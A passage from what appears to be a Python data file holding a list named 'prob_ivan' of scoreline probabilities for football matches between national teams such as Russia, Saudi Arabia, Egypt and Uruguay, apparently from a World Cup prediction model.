0.9898529582994129,
0.992703746030271,
0.9959672309993758,
0.9978351943746017,
0.997971134301495,
0.9982864933718342,
0.9988399797957414,
0.9995016062842046,
1.0]}}
prob_ivan = [
('RUS', 'KSA',0.0634155655684838,0.0268152908603409,0.00983144123131035,0.00246662656168457,0.000469120019354206,0.0601096199842504,0.0464721642943523,0.0179643628987102,0.00462955748897301,0.0978060606483139,0.0756161712654772,0.0292303223284381,0.119357253074235,0.0922779061994029,0.0971047790358138,0.0395004822443828,0.0750739939181365,0.0356711123673805,0.00753288376569325,0.000894805009140276,7.17609956005013e-05,0.0305387540471571,0.0290207372839071,0.0118051153525522,0.00919272597261223,0.00747887205272817,0.00304227099489969,0.00145596250675549,0.0017767782919944,0.00144552307460058,0.000588012856926915,0.000147534869363864,0.000243963482254781,0.000305808334348777,0.000262316344575903,0.000141054687400603),
('RUS', 'EGY',0.00598446805593215,0.00431355897412541,0.00213034389512866,0.000715225526545,0.000181525919001555,0.0135345611505279,0.013905705031322,0.00714351319808372,0.00244646738856481,0.0393110140297204,0.0403889981728837,0.0207482713645584,0.0856338713271432,0.087982117936568,0.124361413706764,0.0903016585578727,0.127771644536626,0.0451973790080804,0.00710574305036654,0.000628388565683269,3.70044765582643e-05,0.0927779049338409,0.0656376952504272,0.0476610273907443,0.0154789262265987,0.0224792026609262,0.016322661690921,0.00182514907184319,0.00397584709091734,0.00577390648403028,0.00419256517214736,0.000135424597985559,0.000398071264126253,0.000884558273139803,0.00133619974240661,0.00129589657278291),
('RUS', 'URU',0.00241797272964352,0.00260403544357249,0.00190524800628263,0.000953745891641086,0.000361890260047655,0.00588296440612078,0.0090732110893525,0.00699674125057583,0.00359699101346511,0.0192243477533935,0.0296494340574594,0.0228639470947059,0.0471159845228995,0.072666302861557,0.0769827937654473,0.0628910824632461,0.118729451661356,0.056036095022074,0.0117542451959661,0.00138689683035127,0.000110440698843125,0.0969960087185325,0.0915573597832539,0.0747977721072287,0.028807886844106,0.0470691981541911,0.0384531747654339,0.00453210067649092,0.0111074970172694,0.0181485362301021,0.0148264441027192,0.000455970861822493,0.00151409481460593,0.0038109399339256,0.00656277741634093,0.00815051970037868),
('RUS', 'POR',0.00118825190564983,0.0013894551449494,0.0010598860841211,0.000551597407537166,0.000217338723301953,0.00359070175603931,0.00574031052788731,0.004588401821615,0.00244509783623714,0.0136689183965596,0.0218519502614309,0.0174669171464304,0.0390256576902178,0.0623887498648693,0.0742805399310106,0.070691936267169,0.118749312628366,0.0498691929883464,0.0093078860528911,0.000977219900501315,6.88336448095404e-05,0.113012356236118,0.0949198758033144,0.0903341550425939,0.0265746245885196,0.0505815296840966,0.0481378605492781,0.00372003579884632,0.0106209459643619,0.0202156644501252,0.0192390155515026,0.000330664818060232,0.00127680322850895,0.00373260319765927,0.00744471442019264,0.0107337288321128),
('RUS', 'ESP',0.000236382030836993,0.000379727613675432,0.000381464357075769,0.000261532427529434,0.000135771223904794,0.000965569002548383,0.00203421165101962,0.0021427868076868,0.00150477141055116,0.00477587858938737,0.0100615780381787,0.010598610362847,0.0177167682271049,0.0373247859561286,0.0438151669252291,0.0541794312618663,0.092307564571186,0.039316980072569,0.0074428710352199,0.000792543963037748,5.66589406278055e-05,0.114142469391236,0.097234440434796,0.120234773744286,0.0276103377854373,0.0682828574276938,0.0844348347840559,0.00392006550979823,0.0145420137409883,0.0359637125305724,0.0444707535702599,0.000353696307838101,0.00177488872957583,0.00674407428138375,0.0174889345940213,0.0362999772619761),
('RUS', 'MAR',0.00143421017986236,0.00143212166963352,0.000919856488145299,0.000401522008555247,0.000132479067734835,0.00457277332552374,0.00610645534576343,0.0040772627719888,0.0018149177955183,0.0175345825800789,0.0234155812915982,0.0156345166678321,0.0504280823206547,0.0673413727168054,0.0966848027291252,0.0926859663166396,0.129112332593422,0.0449636419896766,0.0069594147131545,0.000605907711011158,3.51057290086416e-05,0.123772309318802,0.0862079352554379,0.0826424169856178,0.0200147301172282,0.0383738612298626,0.0367867369948,0.00232339065121162,0.00668188903198927,0.0128110587035188,0.0122811995469599,0.000169594803806773,0.000658021240009246,0.00192981603912291,0.00384628118392031,0.00520620370097124),
('RUS', 'IRN',0.00114086847408626,0.000860937189248814,0.000398833273968486,0.000124669014387379,2.93698861606254e-05,0.00458720975466621,0.00435448614751807,0.00206678467118696,0.000653976723826615,0.0199679461654679,0.0189549093288069,0.0089966335216948,0.06518977146098,0.0618824889134294,0.14188427352247,0.154404185057228,0.134686037187593,0.0293714976161011,0.00284673531694413,0.000155199605915419,5.54877565010385e-06,0.146570774154503,0.0639264950333793,0.0695673884366802,0.00929379632655575,0.0202277674933782,0.0220126718613921,0.000675577865753476,0.00220557318752836,0.00480038727548556,0.00522397491158913,3.03399865575008e-05,0.000133040775501048,0.000439673961183643,0.000980446615181464,0.00134960974299174),
('RUS', 'FRA',0.000613714133209332,0.000814422529299921,0.000690142078258948,0.000398908586513794,0.000174549133218621,0.00212967845193659,0.00378037497701518,0.00335525650687948,0.00198529621980264,0.00909548611661241,0.0161453237636713,0.0143297167458519,0.0291339289819533,0.0517154014519712,0.0622129707742418,0.066425193370832,0.110433740711822,0.0458997952009019,0.00847885472483318,0.000881020811437521,6.1388817219897e-05,0.117910822938619,0.0980150195034197,0.104651273564582,0.0271587849439312,0.0579952225128076,0.0619218761305748,0.0037626865931755,0.0120523348154756,0.0257367124805248,0.0274792552416768,0.000330818986537636,0.0014329097747295,0.00469847259778618,0.0105084993168118,0.0175728386196632),
('RUS', 'AUS',0.0192721950322139,0.0125841818810699,0.00632916372565433,0.00218064774196768,0.00056978870052144,0.0268989030134805,0.0285909591255794,0.0151947264041007,0.00538351324000448,0.0577664926381659,0.0614002522340105,0.0326312954294658,0.0930419263764105,0.0988946617138987,0.0999056681302234,0.0536378754894144,0.106190162197076,0.052557779575306,0.0115613145186752,0.00143053981532115,0.000119774676659895,0.0570119273983856,0.056434988917461,0.0302991108057613,0.0186212962763539,0.0199949970770559,0.010735018179673,0.00307214266949618,0.00494816387526774,0.00531319199020577,0.00285257419079105,0.000325154244343835,0.00071012811251255,0.00117617817101356,0.00133452700387708,0.00100278270904824),
('RUS', 'PER',0.00203120817219686,0.00195589295142913,0.00123486474475422,0.000530480132693518,0.00017233949023108,0.00582735728887679,0.00766812391283297,0.00504517926632009,0.00221295622576885,0.0207006620409703,0.027239661777875,0.017922112160096,0.05515159630152,0.0725730813241608,0.0979581737880578,0.0869947966639986,0.128901554794907,0.0477488639140087,0.00786113784863396,0.000727998203630893,4.49783179290094e-05,0.114475026589597,0.0848097212617195,0.0753179052955471,0.0209439823828039,0.0371999072311925,0.0330365322295517,0.00258608560154055,0.00688996075657164,0.0122376870017549,0.0108680577759516,0.000201397871803175,0.00072445142252897,0.00197074126704103,0.00364775258250992,0.00458614043476726),
('RUS', 'DEN',0.00344525617497237,0.0031389246411848,0.00193867285885202,0.000816477905736071,0.000260279452129122,0.00833352334367046,0.0107750320634074,0.00696592012642771,0.00300225205346478,0.026271439803354,0.0339682982286264,0.0219600694363465,0.06211555312905,0.0803138179375417,0.0979096684310198,0.0771650793510277,0.126594691483419,0.0519218539220246,0.00946460228697896,0.000970458736492411,6.66860945020284e-05,0.099772469565855,0.0818418454918623,0.0645016228000346,0.0223778753887373,0.0352731361008723,0.0277996482860223,0.0030593720358105,0.00723350481185487,0.0114018151983851,0.00898605815572745,0.000265231453975007,0.000847841599203606,0.00205144537266142,0.00338470994907049,0.00380280274323954),
('RUS', 'ARG',0.000485555809521672,0.000654921112298251,0.000557404114261357,0.000323240517245291,0.000141838865290983,0.00181104474940773,0.00322164304111909,0.00286546864393752,0.00169911448797814,0.00814155758538849,0.0144829068124435,0.0128817236467359,0.0274502990350767,0.0488309661547094,0.0617014544790513,0.0693447725280818,0.109759883909202,0.0434323730418282,0.00763837472959514,0.000755632952754145,5.00141493763265e-05,0.12335647914064,0.0976251874244854,0.109718587221647,0.025753753906459,0.0578880423959516,0.065058970909772,0.00339695040681736,0.0114532512355881,0.0257440641665417,0.0289331311336152,0.000283570998047375,0.00129198930910112,0.00445420150559389,0.0104629763734415,0.0183310561245003),
('RUS', 'ICE',0.0141746692771877,0.0102803379023644,0.00562968821816368,0.002113352266409,0.000601826142019015,0.0213450030110848,0.0247370776019443,0.0143341045200798,0.00553734373151183,0.0487545454389374,0.0565024504022884,0.0327408129100653,0.0835209193829696,0.0967937771238221,0.0953858956366544,0.0544682048139783,0.110544294665572,0.0560879559223731,0.0126479568275914,0.00160432984623981,0.000137897153636139,0.0631241049074699,0.0640558072110452,0.0365777854619754,0.0216670871002087,0.024745112052876,0.0141302005128205,0.00366448167502822,0.00627758654716055,0.00716938007461181,0.00409393086563576,0.000398274150190688,0.000925537534516769,0.0016316145013996,0.00197174920171237,0.00160909515143618),
('RUS', 'CRO',0.00254162125443365,0.00234329667794641,0.00143090394659591,0.000594658657455713,0.000186909655767795,0.00689433504650186,0.00877849694840701,0.00558879196858092,0.00237205342794988,0.0234350543594226,0.0298396512197833,0.0189972843941858,0.059744895895481,0.0760726571545847,0.101541691371603,0.0862895058403294,0.129292153895826,0.0484313268926184,0.00806302575266715,0.000755078758076962,4.71975098724426e-05,0.10987167849976,0.0823132884297062,0.0699493270867278,0.0205557293278474,0.0349362651326399,0.0296886235937299,0.00256664516908812,0.00654335791485601,0.0111210107569123,0.00945056665588801,0.000202242816025841,0.000696226385733318,0.00181273608406152,0.00321212724651233,0.00383812465151363),
('RUS', 'NGA',0.00509330784292345,0.00370413641305568,0.00182180386626603,0.000608577930025305,0.000153630224691079,0.0122380537878951,0.0124993787004292,0.00638314190330153,0.0021731480438189,0.0370065201010187,0.0377967377121027,0.0193019146055584,0.0839277155740448,0.0857198635178024,0.126894061231188,0.0959283990134249,0.12960368974133,0.0437751400193183,0.00657135915235304,0.000554888073760892,3.11442608884299e-05,0.0979768031891372,0.0661855891110785,0.050034473950824,0.0149032970505757,0.0225329603641348,0.0170342945271985,0.00167792011796508,0.00380538353868794,0.0057535293134531,0.00434950895543341,0.000118620195006898,0.000362810739916224,0.000838585836875549,0.00131648175273331,0.00132162787718666),
('RUS', 'BRA',0.000158634202685787,0.000262468995931728,0.000267086496703522,0.000185185229317819,9.71576703859223e-05,0.00072527127821907,0.00154260175846511,0.00164050353066711,0.00116307911589964,0.00389586402296286,0.00828623285251372,0.00881212158347604,0.0156952545977202,0.0333827190860958,0.0421542804429317,0.0566089370706816,0.0896592338494016,0.0355013652898327,0.00624759068719688,0.000618447173941064,4.09616359944955e-05,0.120403287008006,0.0953494891858556,0.128044724671579,0.0251696480883146,0.0676005857412998,0.0907807526059223,0.00332204813208153,0.0133835244021805,0.035945440543939,0.0482710927656449,0.000277506880667606,0.00151077458180816,0.00622360355461923,0.0174688639012935,0.0392268381055052),
('RUS', 'SWI',0.00281565426255874,0.00265007305726706,0.00167166379455689,0.000718687853592823,0.00023382861150347,0.00721808030553078,0.00952219760972261,0.00628091150836396,0.00276195692022597,0.0237450912317716,0.0313248732902805,0.020662116583894,0.0585851085474688,0.0772863361119151,0.0963627923491628,0.0792504100406678,0.127123211731283,0.0509786351660006,0.00908592261002365,0.000910903539123156,6.11377687994645e-05,0.104548305521144,0.0838514045043498,0.0689608304974919,0.0224172548829757,0.0368726683432898,0.030324713660341,0.00299657065650123,0.00739329301655356,0.0121607414818291,0.0100012019716227,0.000253691124126728,0.000845971143196973,0.00213487181040891,0.00367187877710022,0.00431502725699789),
('RUS', 'CRC',0.00598750286988913,0.00390361082414493,0.00171978679746007,0.000513750926228317,0.000115898037750142,0.0143345567687395,0.0130697575149075,0.00595827845444789,0.00181085135411502,0.0425638593650136,0.0388082680039692,0.0176920242658477,0.094789229618641,0.0864255704677408,0.140729689236167,0.104467804581743,0.128312506841935,0.0393999363679052,0.00537699376485667,0.000412768048493808,2.09888527913968e-05,0.0952501633657544,0.058495472779849,0.0434229170294466,0.011974503821755,0.0177780556754465,0.013197175778802,0.00122563965178021,0.00272948553339598,0.00405235544623406,0.00300818312859702,7.84433411982148e-05,0.000235349141808264,0.000533230045553607,0.000819193534285613,0.000784546548928382),
('RUS', 'SRB',0.00617924934734026,0.00527753969506819,0.00319231534491418,0.00132053622664637,0.000413972864970344,0.0121842157077548,0.0155205970036515,0.00988528671551826,0.00419738550972026,0.03350607085417,0.0426809763858975,0.0271841146815163,0.069105193822824,0.0880281414831349,0.0950181602228607,0.0653239667866709,0.121036807638656,0.0560663624853006,0.0115426302081506,0.00133668695892899,0.000104365702138819,0.0832115080275986,0.0770900466236993,0.0529985808335811,0.0238063036764621,0.032733157262299,0.0225036947969747,0.00367583183275508,0.00758128496678183,0.0104241043229796,0.00716646000067764,0.000362533922945816,0.00101275377551253,0.00214405593930471,0.00310412077673762,0.00307687006931989),
('RUS', 'GER',0.000504914535354747,0.000769756993462491,0.00076245610841075,0.000517468960492534,0.000266367171573763,0.0016305650864843,0.00341474394687605,0.00357559361456342,0.00249601334593043,0.00684618105823029,0.0143373334321877,0.0150126857730857,0.0215585667833393,0.0451481428352292,0.0452584974307651,0.0475062097187635,0.094780748973125,0.0472748216974589,0.0104799001472815,0.0013067933526522,0.000110311086649293,0.0994879280936533,0.0992453449172612,0.104174253165672,0.0330011177452409,0.0692801621599269,0.0727208833645936,0.00548677508926587,0.0172778087785014,0.0362717833736224,0.0380731806321421,0.000585532430734795,0.00250048822992194,0.00809889210623549,0.0179735830834829,0.032196390276966),
('RUS', 'MEX',0.00323611068992974,0.00301556935545349,0.00190238356591255,0.000818585073180569,0.000266646066879932,0.00789398579495253,0.0104312999134046,0.00689208346137196,0.0030357874750571,0.0251208906386811,0.0331953402438947,0.0219325546565452,0.0599563227188803,0.0792277057789253,0.0953989698766311,0.0758966114065603,0.12606245970816,0.0523466840388404,0.00966073250498491,0.00100289037908854,6.98122878245013e-05,0.100291581028582,0.0832909609413105,0.0662638360185287,0.0230573829606888,0.0366875499155326,0.029187534446114,0.00319148022178827,0.00761714307349525,0.0121199494842524,0.00964227493717177,0.000280321219998752,0.000904701699448481,0.00221034702385493,0.00368343059801101,0.00420585620367347),
('RUS', 'SWE',0.00258254814686605,0.00264468704054167,0.00183107189605257,0.000866106216678599,0.000310336240987,0.00639916649280551,0.00931102075707798,0.00677393748359314,0.00328544207477623,0.0209348697682936,0.030460999440858,0.0221609328647757,0.0513663114612058,0.0747398575685653,0.0840224302748605,0.0687198339579596,0.122255702086972,0.0543746100358819,0.0107483219953788,0.00119510952671772,8.94058938850963e-05,0.0999898660434746,0.0889432538661668,0.0727444518965835,0.0263723472565437,0.0431385599922019,0.0352819440017622,0.00390980017925952,0.00959318190090144,0.0156920447361946,0.0128341289963236,0.000369311849981206,0.00122657088321579,0.00308594115056649,0.00530416807741726,0.00643790031681003),
('RUS', 'KOR',0.011635198946516,0.00781250229294594,0.00380535007225833,0.0012641506399717,0.000317901972462521,0.0205398600693181,0.0209526561496076,0.010686874161803,0.00363388388675652,0.0506505398084273,0.0516684797664848,0.0263534387933164,0.0936767767974228,0.095559428682374,0.115501743835895,0.0712057635051966,0.117823019003358,0.0487399584095904,0.00896102406950206,0.00092672880085177,6.42547322764431e-05,0.0726368083112359,0.0600954727869285,0.0370483066392384,0.0165731669358322,0.0204344101859051,0.0125976260681663,0.00228527915286411,0.00422656078162935,0.00521127175161331,0.00321270113838202,0.000199922389642291,0.000499959991675861,0.000946453432679983,0.00122197692318519,0.00102238458060429),
('RUS', 'BEL',0.00154800161249288,0.00194864756542327,0.00166202268741938,0.000972669476692325,0.000431994990420857,0.00388682949717492,0.00702954524192306,0.0063566598874686,0.00383212318239979,0.0133898038626731,0.0242161978295033,0.0218981638316757,0.0345950692481817,0.0625670883182068,0.0595885659745857,0.051319411581958,0.107769203852169,0.0565780127875309,0.0132013451650582,0.00173265146457293,0.00015440645082095,0.0928139826474124,0.0974532706818599,0.0839296000219797,0.0341081508615291,0.0587498693326122,0.0505971015639555,0.0059688399735227,0.015421617398816,0.0265630936944132,0.0228769112983035,0.00067286693158199,0.00235975131446415,0.00628041542500746,0.0114692547070163,0.0160362558752388),
('RUS', 'TUN',0.00665604667827372,0.0045788014968351,0.00216453367704135,0.000695230344460568,0.000168772467680726,0.0148146735759609,0.0145537746398456,0.00714873517736867,0.00234094663415743,0.0422883003268866,0.0415435675787203,0.0204059751021775,0.0905335680550572,0.0889391953226995,0.129213468523168,0.0922095572198933,0.126937910017163,0.0436864504215651,0.00668220287182685,0.000574930145823721,3.29038734370655e-05,0.090585668900317,0.0623512130108798,0.0444951893139963,0.0143056983557602,0.0204177184651534,0.0145705304611853,0.00164113090638902,0.00351344072597696,0.00501453629197465,0.00357848277297162,0.000118318678784437,0.000341689899759561,0.000745795022069981,0.00110600899798889,0.0010426724224201),
('RUS', 'PAN',0.0180617416648857,0.00935718582008285,0.00355598591227264,0.000918128621531182,0.000179162038297864,0.0303709874019293,0.0239826726695049,0.00946904657331091,0.00249243399580292,0.0698831449351038,0.0551837372922454,0.0217881211869291,0.12059997954768,0.0952326572450281,0.138749289550028,0.0798149610922045,0.109564392832131,0.0376005826865144,0.0057350498311033,0.000492042190468017,2.80773546970049e-05,0.0630264686712823,0.0432591626796947,0.0248846563276725,0.00989719184759467,0.0113866382278379,0.00655011704977562,0.00113218102709687,0.00195384750985308,0.00224788557094262,0.00129308697699546,8.13838444181142e-05,0.000189447090265635,0.000333301026654838,0.000398395184362924,0.000292381587873968),
('RUS', 'ENG',0.00042865015910705,0.000510812691203424,0.000373795968640767,0.00018551930611638,6.95400442241279e-05,0.00184461051230037,0.00279498784020551,0.00211750854036783,0.00106949598707402,0.00896535254792829,0.0135844673916369,0.010291717661292,0.0326806983531204,0.0495183963754412,0.0794189288997485,0.0964998697309214,0.120337024578767,0.0375155933496321,0.00519806675109731,0.000405130006997069,2.0926333296928e-05,0.146218380888974,0.0911684385894351,0.110776392597255,0.0189481061234174,0.0460466993924225,0.0559501438066076,0.00196905163244669,0.00717762989215405,0.0174427018637827,0.0211941722323538,0.000128030342567763,0.000628847011366149,0.00233275134334945,0.00586912634599286,0.0103139450528493),
('RUS', 'POL',0.00481464572504266,0.00496298720058467,0.00368670655665596,0.00188420112629591,0.000731631067163761,0.00888907476047855,0.0140796517673168,0.0111505752415472,0.00588723500988972,0.024494714350057,0.038797856636559,0.0307264999721762,0.050623184689465,0.0801834646446219,0.0697485667446378,0.0480497482800959,0.110476687112606,0.0635024054872759,0.0162228515075669,0.00233123865658491,0.00022876013186695,0.0761073274238679,0.0874935426276345,0.0602742521546491,0.0335277397531852,0.0461944820010216,0.0318233525888064,0.00642395598119415,0.0132763789536589,0.0182921799419919,0.0126014724420771,0.000798331604231667,0.00224341503785454,0.00478974202218667,0.00703570935375757,0.00763579864332773),
('RUS', 'SEN',0.00539902859128808,0.00383588629325329,0.00184631729093186,0.000603461448753742,0.000149038510555075,0.0128467390844322,0.0128350211476834,0.00641165694962664,0.00213526955489879,0.038466811801851,0.0384317249471513,0.0191983350481676,0.0863854788639792,0.0863066838039497,0.129331417725308,0.0968138154166828,0.129213450250249,0.0431139803077537,0.00639360787003518,0.000533330476181727,2.95575273234612e-05,0.096725508325054,0.0645477951886177,0.0483186408906259,0.014358218205516,0.0214963063346868,0.0160915226186344,0.00159694401206724,0.00358628039963412,0.00536917471020197,0.00401921125180473,0.000111464220736116,0.00033753863979363,0.00077235557241518,0.00120008955184355,0.00118673624597062),
('RUS', 'COL',0.000599412828623664,0.000700497399508874,0.000510632328764873,0.000252785442683691,9.4562254713733e-05,0.00233312492105278,0.00353088114448184,0.0026717647100593,0.00134778947498213,0.0105298105403694,0.0159354988481199,0.0120581525453316,0.0356421903352401,0.0539398197958236,0.0804297935544128,0.0907485150373811,0.121720032628042,0.0408154511863605,0.00608281523711207,0.000509926022499272,2.84061518891997e-05,0.137336075639975,0.0921037198295709,0.103920144943527,0.0205896257700038,0.0464623339494006,0.0524232081762899,0.00230138744739763,0.00778993022911516,0.0175786749983078,0.0198339269805778,0.000161467640188159,0.000737033824134252,0.00254220954591322,0.00595493800892341,0.00977899939743532),
('RUS', 'JPN',0.0152136988908174,0.0116103960845491,0.00684034831100714,0.00277198472658658,0.000853360509580935,0.0210034563214047,0.0263712517063007,0.0165554398741588,0.00692882265580642,0.0462629569115379,0.0580862531729406,0.0364655983200836,0.0764253207703369,0.0959571291471393,0.084168559394326,0.0463481626188074,0.105679285903171,0.0602403139519082,0.0152616702255137,0.00217490068644533,0.000211530781004049,0.0581932346677399,0.0663437247195957,0.0365327595502187,0.0252119215965008,0.0277663358027252,0.0152897787056562,0.00479051329477402,0.00791381571021801,0.00871562540957979,0.00479933631648976,0.000590004257499187,0.00132506151721082,0.00226071610910854,0.00265300123583089,0.0021619868128713),
('KSA', 'EGY',0.000387786906748217,0.000496482471887303,0.000392371225726309,0.000210622807734838,8.54408870876254e-05,0.00163689369813704,0.00268661766747685,0.00220475969191327,0.00120621686217344,0.00793926246293467,0.0130306340747305,0.0106935263308302,0.0288802604563299,0.0474008899121642,0.0700375253511183,0.0849240082984331,0.114951907511663,0.0388993092334224,0.00585039350259061,0.000494937993898422,2.78336484118987e-05,0.139384946833866,0.0943347225242796,0.114385577136249,0.0212816856623206,0.051610220113601,0.0625799775083204,0.00240054845400778,0.00873235579670686,0.021176837771655,0.0256779767365936,0.000170039895676538,0.000834210323595821,0.00309280397209443,0.00778832820833633,0.0141031890887318),
('KSA', 'URU',7.46818490355243e-05,0.000143965020631063,0.000169243301928265,0.000135711913868852,8.23827557160541e-05,0.000376207499497214,0.000926458574313943,0.00114076073851125,0.000936422558337187,0.00222771477108351,0.00548602952773253,0.00675502096808269,0.00989356892393714,0.0243641654469874,0.0292924113156213,0.0433637935552016,0.0721362696436334,0.029999920276087,0.00554503131376042,0.000576514762140534,4.01960278645314e-05,0.106788829057603,0.0888223462047992,0.131490502519999,0.0246261999965982,0.0729120891547841,0.107937333929911,0.00341383532514528,0.0151612834473727,0.0448888115327779,0.0664523359061146,0.000300335739610632,0.00180367953058792,0.00820018389820477,0.0254296150993582,0.0678595150020539),
('KSA', 'POR',3.24431214613006e-05,7.05568241834948e-05,9.21662575299133e-05,8.20845671620785e-05,5.53327017126122e-05,0.000188640406054226,0.000515717531695419,0.000704951229858895,0.000642413990782677,0.00126518408484091,0.00345884334656766,0.00472800655629483,0.00636405583253436,0.0173984738168079,0.0213414037924805,0.0357834318097367,0.0583445313598907,0.0237825452132781,0.00430857828403815,0.000439068390201898,2.99771031064925e-05,0.0978270960846214,0.0797530559073316,0.133723070207952,0.0216727613688816,0.0726780474342857,0.121860304023014,0.0029447685734968,0.0148126046163336,0.0496730048657738,0.0832874256859061,0.000253640181297196,0.0017247806471919,0.00887729169045857,0.0311518426711144,0.0995807791508852),
('KSA', 'ESP',5.72266558471428e-06,1.61506521441748e-05,2.68954258102996e-05,3.05557348071745e-05,2.6281466775966e-05,4.18452459619204e-05,0.000146025926803404,0.000254790846709297,0.00029637830755101,0.000348505959765689,0.00121616935452132,0.00212201234646205,0.00217688535221057,0.00759660252422887,0.00906503835181661,0.0188744253886543,0.0316339549787096,0.013254802291843,0.0024683713562298,0.000258565316379934,1.81698151686054e-05,0.0658654381615553,0.0551959665672283,0.114924185899229,0.0154182770728095,0.0642051602956595,0.13368233652582,0.00215344782126768,0.0134511588324605,0.0560136391973097,0.116626671917473,0.000190957860027196,0.00161312718821013,0.0103167342291507,0.0450134003414866,0.212203634729603),
('KSA', 'MAR',8.0664097612042e-05,0.000137584917535734,0.000140357101270082,9.72676707047222e-05,5.09421934360866e-05,0.000450146059845246,0.00095394289102777,0.00101079085270153,0.000714017689119257,0.00279966692776387,0.00593301286232309,0.00628657667728469,0.0130593194169734,0.0276751171025812,0.0406109793378781,0.0631446245444461,0.0860621884602589,0.0293243499981368,0.00444080685889554,0.000378283939016125,2.14260627940423e-05,0.133815157043695,0.0911908602467614,0.141789553614534,0.0207145766749203,0.0644167753676894,0.100159443610433,0.00235272309999067,0.0109745063449424,0.0341277700764868,0.0530641039234672,0.00016785701123051,0.00105606878658799,0.00502134344288341,0.0162187809995,0.0414838346268935),
('KSA', 'IRN',4.40945012914024e-05,5.92815150352852e-05,4.52988478022193e-05,2.33308456268765e-05,9.05228525999337e-06,0.000349584885903483,0.000546178591179943,0.000426664689310493,0.000222201748712683,0.0027536237291249,0.00430216061866111,0.00336076890117455,0.0162673872942261,0.0254155686724739,0.0640677922165853,0.126162914955755,0.1000971663933,0.0198541756971173,0.00175024731497466,8.67899635849245e-05,2.81605055509957e-06,0.197112306419087,0.0781940689176295,0.153980515413258,0.0103398117296224,0.0407225141610284,0.0801911680289234,0.000683630536714097,0.00403863555839639,0.0159058402627256,0.0313219342034168,2.7850449722519e-05,0.000220840358053607,0.00131919531241795,0.00531147594843879,0.0147772901402103),
('KSA', 'FRA',1.48855993378956e-05,3.55530420306222e-05,5.02471281562042e-05,4.8370748480799e-05,3.5229891884974e-05,9.9972964065253e-05,0.000295123162952298,0.000435606176756544,0.000428640795999069,0.00075691105539391,0.00223442394481382,0.00329804296659339,0.00429801960310673,0.0126878816844113,0.0162704916489614,0.0307966136668581,0.0480309752054191,0.0187275020245671,0.00324530697192067,0.00031634009421554,2.06176514311654e-05,0.090912519385249,0.0708944335843364,0.134188230407095,0.0184280476338861,0.0697608254083063,0.132042548899737,0.00239506067280158,0.0136000361587716,0.0514840077944083,0.0974483827701124,0.00019684950510622,0.00151018044157206,0.0087655726909473,0.03465523385083,0.130612303435969),
('KSA', 'AUS',0.000904095481729793,0.00117690070474476,0.00100135567499817,0.000582505084448992,0.000256769430673397,0.00274833279884672,0.00492191246451803,0.00440725779617075,0.00263094497270245,0.0107309896537836,0.019217829716887,0.0172083372989296,0.0314247256549317,0.0562776636657584,0.0613496309503655,0.0598856018517915,0.109869340930944,0.0503930481757312,0.0102726435799883,0.00117792147115873,9.10182665386592e-05,0.107247452100118,0.0983809673310516,0.096033233584535,0.0300825009311427,0.0587292423951517,0.0573277454591185,0.00459924763306618,0.0134684777221119,0.0262941400599025,0.0256666646281298,0.000448867691464991,0.00178012204317495,0.00534950317747236,0.0109910690954055,0.017053223477166),
('KSA', 'PER',9.45364177498724e-05,0.000158038707051548,0.000158631910190464,0.000108189325784111,5.57690108561102e-05,0.000510291841462171,0.00106450371391973,0.00111031380954667,0.00077206353818508,0.00308744392028561,0.00644061937232944,0.00671778645543591,0.0140100857779664,0.0292259980097777,0.0423829568134188,0.0641079239883449,0.0884137492880697,0.0304837162742737,0.00467125414001046,0.000402644348293461,2.30875115766423e-05,0.133733518023207,0.0922185667411802,0.139488636741029,0.0211970396489576,0.0641247477176046,0.0969942817002904,0.00243613897806784,0.0110546189440165,0.0334421533685328,0.0505841778711789,0.000175971347428519,0.00107716553650874,0.00498353608387018,0.0156660511073823,0.0387581689229721),
('KSA', 'DEN',0.000129510007567426,0.000215545771126887,0.000218540633733418,0.000150810151264859,7.87134155963813e-05,0.000631632726786177,0.00133556944668547,0.00141201181578704,0.000995219616057272,0.00355278241538844,0.0075122574298157,0.00794222740004908,0.014987660972679,0.0316909831038038,0.0421509970061788,0.0592723091299455,0.0891270850312361,0.0335048414798131,0.00559787136009953,0.000526090897281079,3.30063054559699e-05,0.125329612845171,0.0942283439345546,0.132502951939026,0.0236150116456451,0.0664143849391157,0.0933912418301616,0.00295913496798413,0.0124833177175294,0.0351078322826985,0.0493682815530401,0.000234042433230451,0.00133328277583751,0.0057447315338851,0.0168470122989076,0.0393019036826893),
('KSA', 'ARG',2.01310496674589e-05,4.61190196146527e-05,6.27891021256798e-05,5.82336516705574e-05,4.08639914291378e-05,0.000128917534012193,0.000366692059204354,0.000521508060613429,0.000494457861772629,0.000935557465626366,0.0026610925829693,0.00378459581335985,0.00509202129599249,0.0144837068816668,0.0184764569656741,0.0335210167201263,0.0525542945221312,0.020598673182999,0.00358829190740866,0.000351608051054635,2.30418361568871e-05,0.0953469265597658,0.0747425190297609,0.135602038570254,0.0195302367626657,0.0708656853730785,0.12856847114614,0.00255162759401982,0.0138879144526863,0.0503924549431815,0.0914247968567154,0.000210876792935541,0.00155077942940506,0.00862875789199411,0.0327063500850218,0.115437747115433),
('KSA', 'ICE',0.000586551779944689,0.000824520988244431,0.000746763315412371,0.000462257494247652,0.000216799151187009,0.00195526597870231,0.00372485611740331,0.0035479963458898,0.00225302269826966,0.00822990268808007,0.0156782778953044,0.0149338580952124,0.0259803393731452,0.0494935354577699,0.0546768744440047,0.0575350567216925,0.104161527112753,0.0471435345190601,0.00948318937820481,0.00107302350060171,8.17603220878128e-05,0.109606473149591,0.09921583704983,0.104402251781934,0.0299367425987199,0.063003315423379,0.06629675458591,0.0045164591867118,0.0142576585511372,0.0300059285319353,0.0315744602746078,0.000434600378771989,0.00185758633131692,0.00601562207137153,0.0133147129201228,0.0227414941917101),
('KSA', 'CRO',7.59321955237123e-05,0.000135364303141648,0.000145032707047454,0.000105681141850487,5.82250685654145e-05,0.000414182691103772,0.000924010910627106,0.00103069995595738,0.000766471756983589,0.00255421702000612,0.00569826901338036,0.0063562080853985,0.0118136719473407,0.0263554272266227,0.0364267780918763,0.0561599377428748,0.0812654442564649,0.0293985031662472,0.00472674317177339,0.000427485431762599,2.57680918694625e-05,0.125288662054576,0.0906485939209841,0.139754863255856,0.0218619611306676,0.0674100999511264,0.103927583354963,0.00263625349167266,0.0121931040615248,0.0375967351963162,0.0579636854688322,0.000200263139391502,0.00125020007275233,0.00590118170570881,0.0189438478708524,0.0494460617179709),
